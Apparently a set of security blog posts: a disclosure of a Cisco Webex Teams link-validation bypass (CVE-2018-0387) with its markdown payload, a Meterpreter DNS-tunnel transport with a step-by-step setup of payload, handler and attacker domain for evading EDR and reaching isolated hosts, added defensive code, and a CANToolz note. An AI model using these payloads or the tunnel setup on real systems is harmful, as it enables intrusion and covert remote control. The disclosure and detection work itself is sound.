Cisco Webex Teams Remote Code Execution Vulnerability (CVE-2018-0387)<br />
Alexey Sintsov, 2018-07-23 (updated 2018-08-15)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Hello all,<br />
<br />
This time I want to talk about our internal Red Team experience and share my bug story for Cisco WebEx Teams (previously known as Cisco Spark). We use this awesome messenger because it provides a good-quality communication channel between employees and has a lot of cool features: group chats (like good old IRC channels), video/audio, picture/file sharing and more. It is an enterprise cloud-based solution with all the cool encryption, SSO integration and privacy things, but that is not the subject of this post.<br />
<br />
I want to disclose some details about the vulnerability we found - <span style="background-color: white; color: #333333; font-family: "open sans regular"; font-size: 16px;"><b>CVE-2018-0387</b></span>: <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180718-webex-teams-rce">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180718-webex-teams-rce</a><br />
<br />
<br />
<a name='more'></a><br />
<br />
The vulnerability was found in the HTML validator/cleaner, which checks that a “message” is “safe”. Cisco WebEx Teams uses Qt and the MSHTML module (on Windows) to render all messages in the chat window. To reproduce the steps I created this simple logic (this is just my simplified version of the logic and all names are fake; in the real software everything is more complicated and a little bit different):<br />
<br />
<br />
<blockquote class="tr_bq">
SENDER:<br />
M = message_from_input ; Input of the user<br />
H = create_html(M) ; Make a HTML with the message<br />
S = clean_html(H) ; make sure that HTML is safe and remove all tags/js/attributes that are not<br />
; defined in the patterns<br />
E = encrypt_html(S) ; encryption magic<br />
send_message(E) ; send encrypted HTML message to the cloud</blockquote>
<br />
<br />
<blockquote class="tr_bq">
RECEIVER:<br />
E = receive_message() ; Get new message from the server<br />
D = decrypt(E) ; decryption magic<br />
S = clean_html(D) ; make sure that HTML is safe and remove all tags/js/attributes that are not<br />
; defined in the patterns<br />
put_message(S) ; put in local database, and render </blockquote>
<br />
<br />
First I tried to inject some XSS vectors, but all of them were cleaned and removed. They have hardcoded patterns, and anything that is not “whitelisted” will be cleaned. Probably it is a result of <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171004-sprk">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171004-sprk</a> but I could be wrong. Anyway, this attack vector does not work (or I am too lazy to bypass it).<br />
Then there is an interesting thing: how the software supports markdown syntax. It actually parses markdown tokens and formats the input into valid HTML. Of course the most interesting part here is URL support. Let’s say input like this:<br />
<br />
<blockquote class="tr_bq">
[TEST](http://test.test) </blockquote>
<br />
will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a href=http://test.test alt=”http://test.test”>TEST</a></p></blockquote>
<br />
Unfortunately it is not possible to inject “ for XSS and so on: it will not be parsed as markdown, and even if it is parsed, it will be cleaned afterwards by the HTML cleaner. Note also that the ‘clean’ function is called on the ‘victim’ side, after the message is received and decrypted. All we need is to check whether this function can be ‘fooled’. But as I said before, I did not find a way to bypass the check on HTML patterns. The last thing to check is the URI scheme patterns. Cisco developers knew about this too, which is why they added a check on the URI: it can be https://, http:// or ftp://, and input<br />
<br />
<blockquote class="tr_bq">
[TEST](file://test.test) </blockquote>
<br />
will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a>file://test.test</a></p></blockquote>
<br />
In other words, just text, without an href.<br />
But as I always say, design is one thing, implementation is another. It is very important HOW you do this check, and unfortunately it was just a substring check over the whole string. An attacker can supply the following input:<br />
<br />
<blockquote class="tr_bq">
[http://bypass.com](file://test.test?http://bypass.com)</blockquote>
<br />
and this one will pass the check and will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a href=file://test.test?http://bypass.com<br />
alt=”file://test.test?http://bypass.com”> file://test.test?http://bypass.com</a></p></blockquote>
<br />
This is already bad, but you can also see that the clean function removed the original text (http://bypass.com) and put the real link (with file://) in its place… so in a real attack the victim would see that the message is kind of suspicious. But I was also able to do a small trick: if in the URL, after ‘http://’, I use a Cyrillic symbol instead of a Latin one:<br />
<br />
<blockquote class="tr_bq">
[http://bypАss.com](file://test.test?http://bypАss.com)</blockquote>
<br />
then the rendering is more interesting:<br />
<blockquote class="tr_bq">
<p><a href=file://test.test?http://bypАss.com<br />
alt=”file://test.test?http://bypАss.com”> http://bypАss.com </a></p></blockquote>
<br />
Now it is rendered with the fake link, and the real link is visible only on a manual check, by moving the mouse over the link:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjs2Q7O6gVW8cBOt1odhetzPI-7PcELMthuM_HgHLVdY1KiUNNu8R8HVxVZSE66LE_XhSUsiunz94zeax2i5o7iFWuyb8FHParC7vNbiMOhgZt9FVD_qbkL1pH6rCH-Y3GL3CB3L23O938/s1600/ciscospark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="824" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjs2Q7O6gVW8cBOt1odhetzPI-7PcELMthuM_HgHLVdY1KiUNNu8R8HVxVZSE66LE_XhSUsiunz94zeax2i5o7iFWuyb8FHParC7vNbiMOhgZt9FVD_qbkL1pH6rCH-Y3GL3CB3L23O938/s640/ciscospark.png" width="640" /></a></div>
<div style="text-align: right;">
<br /></div>
<div style="text-align: right;">
Exploit link in the chat window (with caption text when mouse-over)</div>
<br />
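The substring check described above, next to a check that parses the URL and compares only its real scheme, as an added example that is not code from Cisco or from the original post. Function names, the regular expression and the finding labels are assumptions made for illustration; it also flags link text that mixes scripts (the Cyrillic trick) or shows a URL different from the href.<br />

```python
import html
import re
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "ftp"}  # the three schemes the post says were permitted
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)\s]*)\)")  # minimal [text](url) matcher (assumption)


def substring_check(url: str) -> bool:
    """Flawed check as the post describes it: an allowed prefix anywhere in the string."""
    return any(f"{scheme}://" in url for scheme in ALLOWED_SCHEMES)


def scheme_check(url: str) -> bool:
    """Parse the URL and compare only its actual scheme against the allowlist."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def render_link(markdown: str, check=scheme_check) -> str:
    """Render one markdown link; drop the href when the URL fails the check."""
    match = LINK_RE.fullmatch(markdown.strip())
    if not match:
        return html.escape(markdown)
    text, url = match.groups()
    if not check(url):
        # Same outcome the post shows for a rejected URI: text only, no href.
        return f"<a>{html.escape(url)}</a>"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def scripts_in(text: str) -> set:
    """Unicode scripts of the letters in text, taken from the character names."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ch.isalpha()}


def review_link(text: str, href: str) -> list:
    """Findings a client or a message filter could raise for one rendered link."""
    findings = []
    if not scheme_check(href):
        findings.append("scheme-not-allowed")
    if len(scripts_in(text)) > 1:
        findings.append("mixed-script-text")
    if scheme_check(text) and text.strip() != href.strip():
        findings.append("text-url-differs-from-href")
    return findings


if __name__ == "__main__":
    # Inputs taken from the post; \u0410 is the Cyrillic capital A used in the trick.
    samples = [
        ("TEST", "http://test.test"),
        ("http://bypass.com", "file://test.test?http://bypass.com"),
        ("http://byp\u0410ss.com", "file://test.test?http://byp\u0410ss.com"),
    ]
    for text, url in samples:
        print(url, substring_check(url), scheme_check(url), review_link(text, url))
```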
Our internal tests confirm that users are not careful enough with such links (because the URL is already in the text, and in the pop-up caption the link also ends with the same 'fake' URL). This issue could be used to get stable RCE: for that an attacker needs to use a malicious host with some payload and also needs a NetBIOS name for the exploit link; if the victim clicks this link, the code is executed immediately without any warnings or additional steps (in the video demo it was a .bat file with ‘malicious’ code to execute).<br />
<br />
Exploit protection systems cannot stop or detect this exploit/attack since a legitimate mechanism is used; anyway, we have added an IoC for this exploit to our EDR solution to monitor abnormal child processes spawned from the Cisco Spark process.<br />
<br />
In general, this attack vector is limited, since the attacker needs access to your company chat area, so it can be external users that are invited to your space, external bots, or internal ‘malicious’ or ‘infected’ users. Also, for maximum effect the file:// URI should link to a local resource (a URI with a NetBIOS name in the remote case, or a local path); in other cases (WebDAV/UNC from the Internet, or using an IP as the remote host) clicking the exploit link triggers the default Windows warning pop-up (but if the user clicks the "yes" button, the malicious code is loaded from the Internet).<br />
<div>
<br /></div>
<b>UPD: this issue could be exploited by external parties, since you can register in WebEx Teams with any e-mail, search for any corporate person and send messages with an exploit link.</b><br />
<b><br /></b><br /><br />
PoC video:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='1024' height='768' src='https://www.blogger.com/video.g?token=AD6v5dyDXvKXOtihI_6Tdseh39BDr79Y2Faf9mUtyOzy8oqNcxHSNiTiGVEKzyjhOvsGXgmxsAmZcqHjxGWmUlDIlg' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
<br />
Timeline:<br />
<blockquote class="tr_bq">
Jan 22 2018 – Issue was reported to Cisco PSIRT<br />
~ Mar 21 2018 – Issue was fixed and update was rolled out<br />
Jul 18 2018 – Advisory released by Cisco</blockquote>
<div>
<br /></div>
</div>
Data exfiltration with Metasploit: meterpreter DNS tunnel<br />
Alexey Sintsov, 2017-12-01 (updated 2017-12-06)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Meterpreter </b>is a well-known <b>Metasploit</b>[1] remote agent for pentesters' needs. This multi-staged payload is a good, flexible and easy-to-use platform that gives pentesters remote control over a <strike>pwned</strike> penetrated host[2]. Currently it supports the following "network" transports:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul style="text-align: left;">
<li>Binding TCP port</li>
<li>Reverse connection over TCP/IP</li>
<li>Reverse connection over HTTP </li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1SEsprHsqOdymMaY3A8pkr9cmAbwhhLFhemMOHj4fjxFvDPnLbiEorimg6Pqj9gaI6wFh2XU8xuljzol-1Va1meTJusN1ecMXnDUyBS5pH9VCA0rX3imcKbwm9NClO7QS1KFhBNX-6ute/s1600/logo1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="102" data-original-width="449" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1SEsprHsqOdymMaY3A8pkr9cmAbwhhLFhemMOHj4fjxFvDPnLbiEorimg6Pqj9gaI6wFh2XU8xuljzol-1Va1meTJusN1ecMXnDUyBS5pH9VCA0rX3imcKbwm9NClO7QS1KFhBNX-6ute/s640/logo1.png" width="640" /></a></div>
<br />
<br />
<br />
Last year we, at <a href="https://defcon-russia.ru/">defcon-russia</a>, started a fun open-source community project to implement another network transport for <b>meterpreter: reverse DNS</b> (tunnel). Last week we also presented it at <a href="https://2017.zeronights.org/">ZeroNights</a>. In this blog post I want to share the results of this work, future plans, and the main benefits and features.<br />
<b><br /></b>
<br />
<h4 style="text-align: left;">
Transport design and components</h4>
Our current "pre-release" supports only Windows platforms (both x64 and x86) and consists of the following main components:<br />
<br />
<br />
<ul style="text-align: left;">
<li><a href="https://github.com/defcon-russia/metasploit-payloads/blob/master/python/meterpreter/dns_server.py">DNS MSF Bridge</a> (as intermediate server)</li>
<li><a href="https://github.com/defcon-russia/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_windns.c">Meterpreter DNS transport</a></li>
<li><a href="https://github.com/defcon-russia/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_dns.rb">MSF stager</a> payloads (shellcodes, x64/x86)</li>
</ul>
<br />
<div style="text-align: left;">
The DNS MSF Bridge is a Python script that is used as a DNS server. This is the key component: it works on the Internet as a name server, parsing DNS requests and sending encapsulated data back. A normal DNS tunnel. At the same time this script binds a TCP port for MSF clients (pentesters), so a pentester can use MSF and control a pwned target through this DNS bridge. In other words, this script acts as a transport proxy. Currently we have not implemented a "native" DNS service in Ruby, but there were reasons for that. The main reason is practical: when you do a pentest, you just put this DNS script on, let's say, an EC2 instance, point the NS records for the main domain to that IP, and then you can work with it from any place using MSF. More than this, with the DNS Bridge we have implemented multi-console and payload support. This means that two or more pentesters can work at the same time with different targets and tasks using the same DNS Bridge server and domain name. Currently one DNS Bridge (domain) supports up to 26 parallel sessions (pwned hosts).</div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bip-vwMSrPy1y9xgNki6xVAvV1aQjAtULKT_yvtWrSX-7cPuwoWVvUvCfCHoiPddwxiLNMW1PW-1zL9Gko9DOSExJoLgTFzWwOWB1ym80CSlweY9MntOfL59QrfZDH8jXtQXP7QAwSsa/s1600/design1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="1088" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bip-vwMSrPy1y9xgNki6xVAvV1aQjAtULKT_yvtWrSX-7cPuwoWVvUvCfCHoiPddwxiLNMW1PW-1zL9Gko9DOSExJoLgTFzWwOWB1ym80CSlweY9MntOfL59QrfZDH8jXtQXP7QAwSsa/s1600/design1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
Currently we support two types of DNS tunnels: <b>DNSKEY </b>RR and <b>AAAA </b>RR. Both tunnels are supported in the shellcodes and in the metsrv agent.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_uYYTkOEl5WXlKcqSNTP796nbHr76ca5NXmNOCIQ2XSvXvfpKJDaQm4PSVwRwm7HDFhGj-CzPCXWFF2d4xxbqosqxntWc10UUyd_cRmkxQzcvyU-TAzNjoQofOFRpzNEnAvmRw6vV0zeE/s1600/satges.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="524" data-original-width="1152" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_uYYTkOEl5WXlKcqSNTP796nbHr76ca5NXmNOCIQ2XSvXvfpKJDaQm4PSVwRwm7HDFhGj-CzPCXWFF2d4xxbqosqxntWc10UUyd_cRmkxQzcvyU-TAzNjoQofOFRpzNEnAvmRw6vV0zeE/s640/satges.png" width="640" /></a></div>
<br />
<br />
And now we have the whole transport over DNS: the shellcode stager downloads the main payload (meterpreter) over DNS and runs it from memory, and meterpreter also uses the same DNS transport. Now you do not need TCP/IP DNS tunnels with additional software, like a PowerShell script or Dnscat2. It is stealthier because with Dnscat/Iodine or any other TCP/IP over DNS you need to run an additional process and bind a local port for tunneling, which could be detected by local AV/EPP; now it is done in the right, native way in the MSF payload itself, which means that no sockets and no tunnel processes/binaries/scripts are needed anymore. We also have less overhead for tunneling traffic: we do not encapsulate TCP/IP headers, only the payload (stage) body and TLV packets for metsrv. So it is faster.<br />
<br />
Regarding tunnel types:<br />
<b><br />AAAA </b>- is slower, but it can be used from Windows XP. And yes, you can use this tunnel even if no IPv6 is used/installed on the victim box! To make this possible, we use only reserved IPv6 addresses in responses, which will be passed anyway.<br />
<br />
<b>DNSKEY - </b>this can be used only on Windows 7, but it is much faster.<br />
<br />
The upload tunnel is based on subdomain values, so we have TLV encoded with base32.<br />
<br />
Encryption - we do not use any additional encryption right now. It means that payloads are passed in "plain text" in DNS responses. In the case of the AAAA tunnel they are fragmented across IP addresses; in the case of DNSKEY it is a 16 KB slice per response (TCP is used).<br />
<br />
Meterpreter communication uses standard encryption with session keys (AES+XOR).<br />
<br />
While testing speed I got the following results on different networks:<br />
<br />
Upload<br />
<b>base32 </b>- from 1 KB/sec to <b>4 KB/sec</b><br />
Downlink<br />
<b>AAAA </b>- from 4 KB/sec to <b>16 KB/sec</b><br />
<b>DNSKEY </b>- from 86 KB/sec to <b>660 KB/sec</b><br />
<br />
Speed really depends on many things in the environment and network, but in enterprise networks it will be "fast". DNSKEY shellcodes download the Meterpreter stage in 2 seconds, which I think is good enough for practical use. But of course it depends on many things. Meterpreter also needs at least StdLib loaded first, which takes some time (also a few seconds). The migration process also depends on download speed.<br />
<br />
<h4 style="text-align: left;">
Benefits</h4>
<br />
Let's now review all the features and why this transport could be used. The main benefit is access to hosts in "isolated" VLANs/networks. I still remember doing a pentest for one company where I was performing a social engineering project, part of which was sending e-mails with a PDF exploit to employees under a 'no internet' policy. How do you control such hosts if the attack is successful? A reverse DNS tunnel is the answer! It was also the way we escaped from network sandboxes and so on (for example, some EDR/EPP products have a feature to isolate a compromised host from intruder access, but with a DNS tunnel we can still keep our control). All this works because the pwned box does not make any connections outside the LAN/DMZ, only to the local corporate DNS server.<br />
<br />
Another cool feature is "socketless" control, which is applicable to Windows platforms. The main thing here is that our agent (meterpreter, the pwned process) does not need to spawn a connection, bind a port or anything like that to do DNS resolution. This happens because the MS DNS Cache does all the work for you. In other words, let's say we are injected into notepad.exe. Notepad.exe will try to set up a DNS tunnel with us through the local corporate DNS server, but the UDP/TCP connection with that corporate DNS server is made not by notepad.exe but by svchost.exe. So we get +5 to stealth.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJwM1JlmHZccEJEYRgvIrlP2K4utDTPbWzpH2Xk4EJqP-0lYWbOKOBIAGeXNBk-P37GjaWqoXgm-BB4aU7Cjwt-fyYt3qF93zpjQ1vvlYEdPFPB470Q_JydMS3ppk3VgekOsVQtb4JvDM1/s1600/sock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="508" data-original-width="961" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJwM1JlmHZccEJEYRgvIrlP2K4utDTPbWzpH2Xk4EJqP-0lYWbOKOBIAGeXNBk-P37GjaWqoXgm-BB4aU7Cjwt-fyYt3qF93zpjQ1vvlYEdPFPB470Q_JydMS3ppk3VgekOsVQtb4JvDM1/s640/sock.png" width="640" /></a></div>
<br />
<br />
And again, for most EDR solutions it will not be visible.<br />
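Since every tunnel query still passes through the local corporate DNS server, that server's query log is a place to look for this transport. The following is an added detection sketch, not part of the defcon-russia project: the (client, name, type) record format, the thresholds and all names in the sample log are constructed assumptions, and the real query-name layout of the transport is not taken from the page, only the fact that uploads are base32 in subdomains and that AAAA and DNSKEY records are used.<br />

```python
import base64
from collections import Counter, defaultdict

BASE32_CHARS = set("abcdefghijklmnopqrstuvwxyz234567")
TUNNEL_QTYPES = {"AAAA", "DNSKEY"}  # the two record types the post says the transport uses


def split_name(qname):
    """Return (subdomain labels, zone). Zone = last two labels, a simplification;
    a production version would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def looks_base32(label, min_len=16):
    """Long label made only of base32 alphabet characters."""
    return len(label) >= min_len and set(label) <= BASE32_CHARS


def find_tunnel_candidates(records, min_unique=20, min_encoded=0.8, min_qtype_share=0.5):
    """records: iterable of (client_ip, qname, qtype) from the resolver's query log.
    Flags a client/zone pair with many distinct names, most of them carrying a
    base32-looking label, queried mainly as AAAA or DNSKEY."""
    groups = defaultdict(list)
    for client, qname, qtype in records:
        sub, zone = split_name(qname)
        groups[(client, zone)].append((tuple(sub), qtype.upper()))

    findings = []
    for (client, zone), rows in sorted(groups.items()):
        unique = {sub for sub, _ in rows}
        encoded = sum(1 for sub in unique if any(looks_base32(label) for label in sub))
        qtypes = Counter(qtype for _, qtype in rows)
        share = sum(qtypes[q] for q in TUNNEL_QTYPES) / len(rows)
        ratio = encoded / len(unique)
        if len(unique) >= min_unique and ratio >= min_encoded and share >= min_qtype_share:
            findings.append({
                "client": client,
                "zone": zone,
                "unique_names": len(unique),
                "encoded_ratio": round(ratio, 2),
                "qtypes": dict(qtypes),
            })
    return findings


def constructed_log():
    """Constructed sample: one tunnel-like client plus ordinary lookups."""
    records = []
    for i in range(30):
        chunk = bytes((i * 7 + k * 13) % 256 for k in range(20))  # 20 bytes -> 32 chars
        label = base64.b32encode(chunk).decode().lower()
        records.append(("10.0.0.23", f"{label}.dnstun.example", "AAAA"))
    for i in range(25):
        records.append(("10.0.0.31", f"img{i}.cdn.example.net", "A"))
    records.append(("10.0.0.23", "www.example.org", "A"))
    records.append(("10.0.0.23", "www.example.org", "AAAA"))
    return records


if __name__ == "__main__":
    for finding in find_tunnel_candidates(constructed_log()):
        print(finding)
```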
<br />
<h4 style="text-align: left;">
HowTo</h4>
<br />
0) git clone and install https://github.com/defcon-russia/metasploit-framework<br />
1) Buy a domain. Shorter is better. Like:<i> msf.ws</i><br />
2) Get hosting like EC2 (let's say the IP will be 1.2.3.4)<br />
3) Point the NS records for msf.ws to the IP of that server<br />
4) Deploy the DNS MSF Bridge to that server and run it<br />
<br />
<blockquote class="tr_bq">
./dns_server.py --ipaddr 1.2.3.4 --domain msf.ws</blockquote>
<br />
5) Prepare a payload<br />
<br />
<blockquote class="tr_bq">
./msfvenom -p windows/meterpreter/reverse_dns DOMAIN=msf.ws RHOST=1.2.3.4</blockquote>
<br />
6) prepare an exploit with generated payload<br />
<br />
7) run the MSF handler<br />
<br />
<blockquote class="tr_bq">
use exploit/multi/handler<br />
set payload windows/meterpreter/reverse_dns<br />
set DOMAIN msf.ws<br />
set RHOST 1.2.3.4<br />
run</blockquote>
8) deliver an exploit to targets and wait... sessions will be spawned<br />
<br />
<h4 style="text-align: left;">
Feature plans</h4>
Currently we are trying to get this transport into the main MSF fork. This means that merge work needs to be done, and it is in progress now. This activity, including creating native DNS handler support (so it should work if we use MSF as a DNS server, without the Bridge), is now our main target. If you want to help us, please let us know!<br />
<br />
After (and IF) the merge is done and this work is not just a fork but part of Metasploit, we can start implementing more features:<br />
<br />
<ul style="text-align: left;">
<li> Payload XOR encryption for stager </li>
<li> Powershell/VBS stagers</li>
<li> Adding more OS platforms supported</li>
<li> more types of tunnels: TXT, NULL and etc</li>
</ul>
<br />
If you want to help and participate - let us know!<br />
<br />
If you have any questions or ideas, feel free to contact us on IRC (freenode.org #Metasploit, ask <b>RageLtMan</b>) or Telegram (https://t.me/DCG7812 -- warning, Russian is the main language, but we can speak a little English! Ask me or <b>max3raza</b>). Or just drop an e-mail...<br />
<br />
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;">Sources:</span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br />
<ul style="text-align: left;">
<li><a href="https://github.com/defcon-russia/metasploit-framework"><span style="font-family: "calibri"; font-size: 18pt;">https://</span><span style="font-family: "calibri"; font-size: 18pt;">github.com/defcon-russia/metasploit-framework</span></a></li>
<li><span style="font-family: "calibri"; font-size: 18pt;"> <a href="https://www.blogger.com/goog_24869399">https://</a></span><span style="font-family: "calibri"; font-size: 18pt;"><a href="http://github.com/defcon-russia/metasploit-payloads">github.com/defcon-russia/metasploit-payloads</a></span></li>
</ul>
</div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
</div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;"><br /></span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br />
<ul style="text-align: left;">
<li><a href="https://defcon-russia.ru/meetups/zn2017/ms.pdf?dwl" style="font-family: calibri; font-size: 18pt;">ZN Slides</a></li>
</ul>
<span style="font-family: "calibri"; font-size: 18pt;"><br /></span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;">Usage Demo: </span></div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/Lzb8LFt8Whg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/Lzb8LFt8Whg?feature=player_embedded" width="320"></iframe></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br /></div>
<br />
<br />
<br />
<br />
[1] <a href="https://github.com/rapid7/metasploit-framework/wiki/Meterpreter">https://github.com/rapid7/metasploit-framework/wiki/Meterpreter</a><br />
[2] <a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/">https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a><br />
<br /></div>
Next page in CANToolz life<br />
Alexey Sintsov, 2017-08-18<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Hello to all <b>CANToolz </b>users (And I know both of them, yeah..)!<br />
<br />
<br />
A few things have happened. First of all, unfortunately it is very difficult for me to work on new features and maintain the project... one of the main reasons is that I do not have hardware (not even a car), so it is not the best environment for development. Working with remote testers is very difficult and not so productive. I have a lot of ideas and plans, but it is not possible to implement them without proper support (from the community or a good R&D team, for example), without a comprehensive testing environment (hardware, vehicles, etc.) and of course without enough free time... <br />
<br />
Just one more example is <b>CAN-Pick</b>: <a href="https://cansecwest.com/slides/2017/CSW2017_MinruiYan-JianhaoLiu_A_visualization_tool_for_evaluating_CAN-bus_cybersecurity.pdf">https://cansecwest.com/slides/2017/CSW2017_MinruiYan-JianhaoLiu_A_visualization_tool_for_evaluating_CAN-bus_cybersecurity.pdf</a> <br />
<br />
This tool was also presented at BlackHat US 17: <a href="https://www.blackhat.com/us-17/arsenal/schedule/index.html#can-pick---a-visualization-tool-for-evaluating-can-bus-cybersecurity---arsenal-theater-demo-7026">https://www.blackhat.com/us-17/arsenal/schedule/index.html#can-pick---a-visualization-tool-for-evaluating-can-bus-cybersecurity---arsenal-theater-demo-7026</a><br />
<br />
As far as I can see, <b>CANToolz </b>was used here as the "engine" and/or the source of ideas (e.g. modules) for <b>CAN-Pick</b>. Yes, they have missed a few modules that were introduced later, but maybe they do not need them 8)<br />
<br />
But anyway I <b>want other people to use CANToolz</b>, especially when they <b>can do more with it than me</b>! And these guys with their resources and talents can do a lot; for example, they have added graph visualization and dynamic config and module loading, which I planned to do but had no time for... so they did great work! Maybe I am just a little bit disappointed that they did not want to contribute their ideas and code to <b>CANToolz</b>, ha-ha-ha, but this is a typical example of high expectations 8)) <br />
<br />
<div style="text-align: left;">
Anyway, this is the time for some changes, and the best idea here: to change the maintainer... so please welcome the new maintainer: <span style="background-color: white; color: #24292e;"><b><span style="font-family: "arial" , "helvetica" , sans-serif;">Tao Sauvage</span></b></span><span style="background-color: white; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-weight: 600;">. </span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-weight: 600;"><br /></span></div>
<div style="text-align: left;">
<b>Tao</b> has helped CANToolz a lot with contributions, bug reports, ideas and moral support. He is an active CANToolz user who is helping the project development, and I believe he can provide much more as a leader there! Thank you Tao!<br /><br /> I will stay as a supporter, and if I have more time and resources for unrealized ideas, I will also contribute. Anyway, I am still here :-)</div>
<br />
Oh yeah... one of the main reasons for this post, the new GitHub URL:<br />
<b>NEW GitHub</b>: <a href="https://github.com/CANToolz/CANToolz">https://github.com/CANToolz/CANToolz</a></div>
How I have tested EndPointProtection solution...<br />
Alexey Sintsov, 2017-02-07 (updated 2017-02-08)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";">I have just finished an evaluation of some EPP products, and I found this challenge difficult: how to choose a solution that will fit your organisation. Of course, first you need to understand whether it is reasonable to spend money on EPP; probably you can get the same or better results without EPP (like better app-control, DeviceGuard, etc.). But if you are sure that you need it, and it is the only way for you, then what are you going to do? The right answer: run a PoC/pilot with the chosen vendors, and check what YOU as a customer need. Sales demos and presentations, NSS Labs reports and Gartner quadrants will not help much. I want to share how I did it. (It is not the best or a complete way; I do not work in a SECURITY company, so it is just a way I can tell one solution from another as a customer, from a technical point of view.) This text is only about exploit/attack protection quality, and I do not want to cover too many other things in this blog post, but they are also important, for example: classification of collected data (by vendor/solution, if we are dealing with cloud-based solutions), report quality, SIEM integration, customization, performance, attack surface (yes, even EPP makes your attack surface bigger, like any AV...) and so on... </span></div>
<div style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"><br /></span></div>
<h3 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
